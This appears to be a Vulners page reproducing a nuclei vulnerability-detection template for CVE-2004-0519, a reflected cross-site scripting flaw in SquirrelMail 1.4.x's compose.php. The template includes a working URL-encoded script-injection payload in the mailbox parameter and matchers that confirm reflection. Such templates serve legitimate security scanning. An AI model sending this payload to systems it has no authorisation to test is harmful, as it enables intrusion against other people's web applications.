Lucene search
K

SquirrelMail 1.4.x - Folder Name Cross-Site Scripting

🗓️ 11 Jun 2026 03:33:20Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 33 Views

SquirrelMail 1.4.x XSS Vulnerabilit

Related
Refs
Code
id: CVE-2004-0519

info:
  name: SquirrelMail 1.4.x - Folder Name Cross-Site Scripting
  author: dhiyaneshDk
  severity: medium
  description: Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, phishing attacks, or defacement of the SquirrelMail interface.
  remediation: Upgrade to the latest version.
  reference:
    - https://www.exploit-db.com/exploits/24068
    - http://security.gentoo.org/glsa/glsa-200405-16.xml
    - ftp://patches.sgi.com/support/free/security/advisories/20040604-01-U.asc
    - http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000858
    - http://marc.info/?l=bugtraq&m=108334862800260
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P
    cvss-score: 6.8
    cve-id: CVE-2004-0519
    cwe-id: NVD-CWE-Other
    epss-score: 0.00189
    epss-percentile: 0.40577
    cpe: cpe:2.3:a:sgi:propack:3.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: sgi
    product: propack
  tags: cve,cve2004,squirrelmail,edb,xss,sgi,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/mail/src/compose.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "</script><script>alert(document.domain)</script>"

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 490a004630440220774b4b06259c725e61d2b23184d62071271b7530793fbd79ad9f63ce46db352802200fd20dc17a10e72cd66d6cd540df1cc2968addbb6bb4cd29e86f736d02b6ed77:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.7Medium risk
Vulners AI Score5.7
CVSS 26.8
EPSS0.00189
33